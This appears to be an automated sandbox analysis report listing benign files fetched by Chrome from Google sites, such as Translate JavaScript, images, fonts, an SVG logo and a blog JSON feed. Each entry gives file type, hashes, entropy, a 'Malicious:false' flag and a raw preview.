                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en_US.zBx702B3GfA.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,RqjULd,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,bm51tf,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,qRXAtf,rCcCxc,rPRh8e,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDl8vd75v4HDANrmnL9WdUtR2w0E0Q/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=sOXFj,q0xTif,T8kZcd"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.fl(_.gr);._.k("sOXFj");.var xv=function(a){_.M.call(this,a.va)};_.C(xv,_.M);xv.Ba=_.M.Ba;xv.qa=_.M.qa;xv.prototype.i=function(a){return a()};_.tv(_.tka,xv);._.p();._.k("oGtAuc");._.woa=new _.ul(_.gr);._.p();._.hw=function(a){_.Cn.call(this,a.va);this.soy=this.wd=null;if(this.Nf()){var b=_.wl(this.Ce(),[_.om,_.nm]);b=_.Fe([b[_.om],b[_.nm]]).then(function(c){this.soy=c[0];this.wd=c[1]},null,this);_.Dn(this,b)}this.s=a.Xd.cY};_.C(_.hw,_.Cn);_.hw.qa=function(){return{Xd:{cY:function(){return _.Ue(this)}}}};_.hw.prototype.getContext=function(a){return this.s.getContext(a)};_.hw.prototype.getData=function(a){return this.s.getData(a)};_.hw.prototype.Cx=function(){};._.iw=function(a,b){_.En(b);a&&_.ql.ab().register(a,b)};._.k("q0xTif");.var epa=function(a){var b=function(d){_.co(d)&&(_.co(d).Ca=null,_.Lv(d,null));d.XyHi9&&(d.XyHi9=null)};b(a);a=a.querySelectorAll("[c-wiz]")
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x273, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):205761
                                                                                                                                                                                                                                                            Entropy (8bit):7.696724954274156
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:aRNRNRoD/G3VAW9Zi600000T5Z5+5+5fUJ3w42K:aRNRNRyGFANIIEg42K
                                                                                                                                                                                                                                                            MD5:0EAA9A2D86008E6FA18A06F1B4D981A4
                                                                                                                                                                                                                                                            SHA1:C6EE26B7376F5373CBA7975B93DB60A0B2DE863D
                                                                                                                                                                                                                                                            SHA-256:E1AC1B61D32010F60166A81992964EF7D9A5AAF366127ED575CF45B7B61D6983
                                                                                                                                                                                                                                                            SHA-512:44923153A5ED33943A9E8C69B8D8E42037A560722A8ECFAF1815E057AE33DAF77347FC3D292FF7A3FC15A836925F45A1B88CCDEFC55CD127C17E8799C8202C4F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/S2YXjtSfM-nTFgL7NVN1Tq5pWVcOPb0tjeG_BzjraNGRtkr-HFaSBG4OpePt7naldeQvWoExSs2K-JmFB5ttVh-fiS-KPuRf40fojUof=s660
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa......ICC_PROFILE......XKCMS....mntrRGB Lab .........2..acspMSFT....KODAsRGB........................KODA................................................A2B0...D...4bXYZ...x....bTRC.......B2A0......jcprt.......Gdmnd...L...wdmdd.......[gXYZ... ....gTRC.......lumi...4....wtpt...H....desc...\...zrXYZ........rTRC.......vued.......Fview...4...$mft2.....................................................g.......6.....Q.......O.(...........-.W.......k.....I.......\ .!.#.$X%.&.(.)A*x+.,.../I0{1.2.4.576d7.8.9.;.<6=^>.?.@.A.C.D:E\F}G.H.I.J.L.M5NQOmP.Q.R.S.T.V.W.X3YIZ_[t\.].^._.`.a.b.d.e.f'g6hEiSj`knlzm.n.o.p.q.r.s.t.u.v.w.x.y.z.|.}.~..........!.$.'.).*.,.-.........-.,.*.).&.$.!..........................................w.l.a.V.K.?.3.'.....................p.a.Q.@.0................~.k.X.D.1..............v.`.J.4.............{.c.J.2............h.M.3...........v.Z.>."...........u.X.:.........g.......6.....Q.......O.(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x333, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):44316
                                                                                                                                                                                                                                                            Entropy (8bit):7.98091015162583
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:xBpvHF10JmIulXcbqKOzcslyNgo212n9osllTcX3k5jFT5J1dJfCJ8RhWT569qSe:x7vlCJmIulM2eslyuqlGX6FTJXCJqhWf
                                                                                                                                                                                                                                                            MD5:CA88528299E20C7F7499C2628BA2F4E6
                                                                                                                                                                                                                                                            SHA1:A9A15FD459050547EE2360D6EDFE93D70F9937E6
                                                                                                                                                                                                                                                            SHA-256:B561C264D8DC196307E56F7D7AFC0798C8CD6DEA54EDD33650F21CD86473E035
                                                                                                                                                                                                                                                            SHA-512:707D03B1981C0851D845FFC93F66A8611AF5A524E05AE66C510BCA4FF809320EE700C9C8E8D601D3439DE621F6CEFCE01B7AA71AA58118C9F8C43BDA900C3797
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF......................................................................................................................................................M....".........................................c.........................!.1Q.."Aaq2....BR.#b...3r...CS.....$d....%4FTcs.........D......EVft.....................................8.........................!"12.AQ.Bq.R.a..#.3br..$.................?.....8..E..4..<i.1..H.P..,-.@P7.....+......i....)M...m..4W.k.WKbq^.w...]"s_R.+..Y.WV..W..8.tWZ+.WK.4WZk.5...........:..M......F..E...?...T..o.P..Z..{...%q8..M......+W.k........y.....t.Mr.Ki...N..d.Yi...a]+.+.3....f.f..lp.A.BJ..V.5yu.w...9..(...c..Y..../q..Z....`2..J...7..w..i...I.._.}..9dO.L^.0..`'.r..<.JI....AP.YyJ........n...H.4.r...6!K[R..P...l.t..q.F52...-.@.....j....L1..a<rHA...L-...Z....+.8...^..... .{[..|..Pv4....q2>...&.q......,..id.*.w.......O$N5Y.^_..J..Ix..%.....\F C.g..F..].Ek.\.*...I..@Ul..b2...\]$..=.-..-\B..B.#_q...qaosQ.>n..#p.s..G.....w....3*..SP
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 7972, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):7972
                                                                                                                                                                                                                                                            Entropy (8bit):7.971311754375175
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:1+kjalLlQWY/e71gQQv9HbQcDn5WJkWrM+nVzfiA:IXpBQe7iv97zIlQ+VzV
                                                                                                                                                                                                                                                            MD5:3A2F0DF321648E61D33B11192D3A8304
                                                                                                                                                                                                                                                            SHA1:58FB1956DFA16EDCB324F06BFACF834ECF60514A
                                                                                                                                                                                                                                                            SHA-256:2D70A6994D0FBB29DE4DF929855C0C5DF5E9841829614F80EB32B49F2BA58C0E
                                                                                                                                                                                                                                                            SHA-512:F593184F5D7D3BD8BC51A6BF1B26AACD6182F1BD289BA1ABB8F1BB9D2E6A6C3CD6C4E3D357DDF489C90A2A9EBF8CEF11803CF0510A0D3ED5BD2DC91DFBD1A609
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjEUvaYr.woff2
                                                                                                                                                                                                                                                            Preview:wOF2.......$......>...............................<..X.f?HVAR.T.`?STAT..'...:/<....D.R..J.0.Z.6.$.... ..>. ....7..xp.@Q..&.?.pC``..}..o,.:....=.....z...JRB.I...=E.?.pl...qc.U..X....C........S..7.!.,<...of.l....P."....k...$;...........M..S.....E..h..B.R..D..:U./.......B_.ka"(..E..M}..Y..s...8b..`A..L ....v{.h.V.}u..J-WD..h..Nz..2.y"td.&.8D...&.Q.D.D.7.....i.Q.T.j.....U..W..0?y.d..L.V....D^R......DV2.YH.n~&..y..3.mP............\N? )....?M.P[\....^'...WU....B.#...<./P&.2,.R..e.|..>>x......RH......TZ....w.r.Rj.4..8d^[..a3....)..C../5.!t[...o..e.SU.Q.0.K.../~.........L....z...'.."..&.5.0...$...L#.0.0.,.<..., tt.KY...5.B..[.!...`=QGE.gA|.tj.4o:+......}K~8...L...ii'n.5,..U.....%..d._..@.|z(V..*.......|\..c.9.#{....r...g.4.".M^?^......W......c..@/p......X.........s%X........g.AYIu.a.V2.g]...B.>...U3b.........1.....@#.j.[m..e+.c(.2..*xg[wE.<6$&:...G....k.d6.m.c. V.P...!eu..I~.t.6$mJT.rjq..qT}*.Y.^8.-....=.8<..J<[.rU......G.M..lI..<1DSX.9%E.ib:..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):68738
                                                                                                                                                                                                                                                            Entropy (8bit):7.948798168119639
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:bSFzl579NKsDuX06xVg8hb6NRgESUXVz3UgyIAEP7W5W0LpGI:bSFzl579NKsC06Zb6DgESEbUBIAd5WI3
                                                                                                                                                                                                                                                            MD5:8500A64528D3572D39BBC171FDB26382
                                                                                                                                                                                                                                                            SHA1:77024C098EF04EAD512628A09B596B10C908CD79
                                                                                                                                                                                                                                                            SHA-256:2DCC5D3048CA5089E0AA09246DE656B9E1B586C2CEEC9645A417DB7F160F8605
                                                                                                                                                                                                                                                            SHA-512:D4D9E6F9C87CA9BCF1C972E2AFD98E3CFC9BCC29C9F63C33C29FECC6C47C3D75D598DD9BCC303E78A11ABEEACF0B771F7A547372824B8071BFCA428FA80F07C5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa.....PICC_PROFILE......@appl....mntrRGB XYZ .........!.#acspAPPL....APPL...........................-appl................................................desc...\...bdscm........cprt.......#wtpt........rXYZ........gXYZ........bXYZ........rTRC........aarg...$... vcgt...D...0ndin...t...>chad.......,mmod.......(vcgp.......8bTRC........gTRC........aabg...$... aagg...$... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ........daDK........nlNL........fiFI........itIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW........viVN........skSK........zhCN........ruRU........enGB........frFR........ms..........hiIN........thTH........caES........enAU........esXL........deDE........enUS........ptBR........plPL........elGR........svSE........trTR........ptPT........jaJP......
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, baseline, precision 8, 1000x400, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):115581
                                                                                                                                                                                                                                                            Entropy (8bit):7.96539376502019
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:7HxpzjMHQ4MeFt5vCCyLubTIAVSTWHA9Uej5oYig5:7HDMHJFtcXLg1hH4UeXi2
                                                                                                                                                                                                                                                            MD5:A5DAAEDB989BDD603227C9DC95924672
                                                                                                                                                                                                                                                            SHA1:0A689FD2DFBCD14E2ED7C8D6D3A9E374B0EAA241
                                                                                                                                                                                                                                                            SHA-256:37A2F54E5B770C0F3EBF17C789959D4E17A4978472BE3E9068764C82167A273D
                                                                                                                                                                                                                                                            SHA-512:1DCA2045A8FB999F889FC07CAA6105FE31C3DBF252816EF7076BBC54B9864DCD2191A23FF7738ACB25EE2C973CEF5581376891992B63CD40B2EB5074C8E2193A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:............................................................................................................................................................................................................................................!..1.AQ..a".q.2...B#....R$..b3.rC%.....Scs.DTt...v7.....5&.4UV'..d.F......................!..1A.Qaq.."....2R.....Br.#.b..3S$....C4.sc.5.DT%...............?...@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x299, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):45758
                                                                                                                                                                                                                                                            Entropy (8bit):7.9314404503062805
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:ft+1XmOH7lDjO486TdzuWT2+UgLmXTSrOJSFJHiJggMW/u7MUZI69:ft+PbodiEClxLasFJ8gRz7pZZ
                                                                                                                                                                                                                                                            MD5:DB6D21F32759A4D00CA2E38244F4E718
                                                                                                                                                                                                                                                            SHA1:1439C2EB4B4CC647778A0E630B63C646C6A96025
                                                                                                                                                                                                                                                            SHA-256:F8013084FA3380269614BEA96BE844BDD28528455B028CD457B5F36E52DD1C2C
                                                                                                                                                                                                                                                            SHA-512:8EBB58F6CEEE53FD0DC7B8EF267D9D8266AFC2DEC9C04971116A8D0254EF9D6593AB5CBD623C6B92D86A162E065D3F054AA65869EC16CA33121BC007B55037FE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa.....@ICC_PROFILE......0ADBE....mntrRGB XYZ ............acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 1999 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../................................................................................................................................................+...............................................S.........................!1...A."Qaq...2....#3B...$Rb.rs...%CS....t.4Uc........ET..................................J.......................!1..AQ..aq.."2......#BR..3br..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 1000 x 400, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):65556
                                                                                                                                                                                                                                                            Entropy (8bit):7.959436720456734
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:pwzVQMFk4sC7PkHT+43/Own+jldHPYAzWSgBZeeIwW8wFdcMa:pZMFhsC7ET+M//+jbYBSgjeeI3s
                                                                                                                                                                                                                                                            MD5:5B3ECF25EFA73254E094E8E31B7E6994
                                                                                                                                                                                                                                                            SHA1:A533B3C0C7EB52505D059CB38A25262310688EAA
                                                                                                                                                                                                                                                            SHA-256:C1739E9DF7512F04A856C86E30B613C7E864E04D330ABA02A9218F4EA5ECA8F0
                                                                                                                                                                                                                                                            SHA-512:1D7640108E12482AD4F6E98B81ABFE8586838FE1122AA0C1C85F8119F2E7A76906BE54C7E6D5BB8F8E761958440803A3027672BA85135BCCC1B9FA28C2DE719F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2022/nowruz-2022-6753651837109194.2-2x.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR................S....PLTE.........x..n............y..~...........c.................I..,3,.tk.Y9.uL...............}]A..q......mV..............m....w\..........dJ.....w@................................C.[................b.q%.s...6..t.H.._.....{B.......j...........~.h8.:..pI..W.`..R.......Y'..R.o.p.....W...v...|....*..{.....H..6.....H....;r.....f<.]....j.f......Ol.Rw..d....."...,[.^..5h.......V..by..Z...y...J....l......X..t......5..*..N...........Cc...}....%..5...*J..._.-u..k<U.K^..D.+".!....b....N.<s.......'...~.I......x.uO.._o....NAjj{T..q..T..B..,<......[.7.Q..)........e..|.....[..<...v.....V<+..M.......\..<....r..q.........m...n....f......Q._...y....].............H....`.n(.......^.o...>|.p.H.....g...........p......P..>.{).o..h6.B..V..C.}...A.....tRNS..s....b>.............,.........................1....IDATx...m.0.@.@|4..Rh...%q.......2.|.r.....................................c....1..!....).c.Q+.y^.r...^....Ug.fu..b...C...(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1719
                                                                                                                                                                                                                                                            Entropy (8bit):4.4003431597789415
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:9/S90MU5IahYdmMqPLmumqrYX3DyZ/jTq98:920MUSahYdmM5qrYHw/jmi
                                                                                                                                                                                                                                                            MD5:7E4968170175907C71DC14EC4841ACAB
                                                                                                                                                                                                                                                            SHA1:C9010640A0CC81506E9721E69E0A508ECFBEAA0A
                                                                                                                                                                                                                                                            SHA-256:D7CE0FF7DA59E9040AC54917098C68952C6B4B849ABFF732908008E20E8DF18B
                                                                                                                                                                                                                                                            SHA-512:A709A66A26B7BAB6511131B89396AE88AF1BD0B8E16B72447B8FEEF3A8D4663670752D3207650456580130111B5D797B3B59E0C739F9CE6BD4D1D5F34C926E9D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:<svg id="google-color-logo" width="74" height="24" viewBox="0 0 74 24" xmlns="http://www.w3.org/2000/svg"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"></path><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"></path><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):11904
                                                                                                                                                                                                                                                            Entropy (8bit):5.095404592764834
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:m4ID5oZmnh9ohK2zSBHWx8KaQwCuluO8JU:m4OognnMK2zSBHWx85QwCuP8U
                                                                                                                                                                                                                                                            MD5:8CEF9A7B47C33610A34DC48A4F1EFCC7
                                                                                                                                                                                                                                                            SHA1:536C576A7DA24F7AF155745CCC901A5D005859D5
                                                                                                                                                                                                                                                            SHA-256:1382F8E0EFF8F1C108EA9B736B0E9EFA0F224214E5FABA25EB3B62DE15DD8137
                                                                                                                                                                                                                                                            SHA-512:5D07FAD97BB5CB0C3D4FF00DB1B08E0B28FD6E586C6F96292309A3471F0C448109D48D366C08B355A63FFBBA57DC10A8B22C104AD4FCC15C9E1F2CE7CE5285DD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.blog.google/api/v2/latest/?tags=accessibility,ads,ai,alphabet,area-120,arts-and-culture,civics,company-announcements,data-centers-and-infrastructure,design,developers,digital-wellbeing,diversity-and-inclusion,doodles,education,entrepreneurs,families,google-news-initiative,googleorg,grow-with-google,health,next-billion-users,nonprofits,public-policy,research,safety-and-security,small-business,sustainability"
                                                                                                                                                                                                                                                            Preview:{"meta":{"total_count":3767},"next_page":"/api/v2/latest?paginate=12&tags=accessibility%2Cads%2Cai%2Calphabet%2Carea-120%2Carts-and-culture%2Ccivics%2Ccompany-announcements%2Cdata-centers-and-infrastructure%2Cdesign%2Cdevelopers%2Cdigital-wellbeing%2Cdiversity-and-inclusion%2Cdoodles%2Ceducation%2Centrepreneurs%2Cfamilies%2Cgoogle-news-initiative%2Cgoogleorg%2Cgrow-with-google%2Chealth%2Cnext-billion-users%2Cnonprofits%2Cpublic-policy%2Cresearch%2Csafety-and-security%2Csmall-business%2Csustainability&fields=&is_main_hero=False&show_hero=True&cursor=2","results":[{"headline":"The U.K..s biggest and most local publishers join Showcase","full_url":"https://blog.google/around-the-globe/google-europe/united-kingdom/the-uks-biggest-and-most-local-publishers-join-showcase/","tag_eyebrow":"https://blog.google/around-the-globe/google-europe/united-kingdom/","category":"article","eyebrow":"<time class=\"uni-timesince\" datetime=\"2023-03-17 08:00:00+00:00\">Mar 17</time> / UK","published_node"
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):52366
                                                                                                                                                                                                                                                            Entropy (8bit):7.972300129058378
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:56uQaPeWybG/qWHNOHWtqIhmWj+fhsPTQ:56uQ4ex838HWLmjhATQ
                                                                                                                                                                                                                                                            MD5:0A938CDA57C0151598101FF35FF06D36
                                                                                                                                                                                                                                                            SHA1:BDBF0726A4F1E01291997E7F12329D817945E780
                                                                                                                                                                                                                                                            SHA-256:2535848B5E55E10EED6ED92760A5A78F696567A3B80E6A60B8BAE919B9FBBE2B
                                                                                                                                                                                                                                                            SHA-512:6F67C0C4F6967B588F056C2091D113995253CC024190213EA1FBF49500305AE5E2F33E53E6FA3524130A4F4A6B4A4301C46E17C52FFE82B435A6D2E99FE1951B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/iHqzYEhiw5A9ZGZIu3rGSAQPgXPHm_Hs6Svm6nEgURlbUDdNE-1gOmOW81l6kRMf1pziEJWK41YXQVVxQOZl3OF0Oy-a_nYl7NFKyzpep_RjmcBlh54?=w1440
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................V........................!..1.."A.#2Qaq....3BRs......$SU.....%4brt......C....D...Tc.5.................................G......................!.1A.Qaq........"2...3Rr..B....#4Sb...$s.C.5c..............?...J.E..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):15552
                                                                                                                                                                                                                                                            Entropy (8bit):7.983966851275127
                                                                                                                                                                                                                                                            Encrypted:false
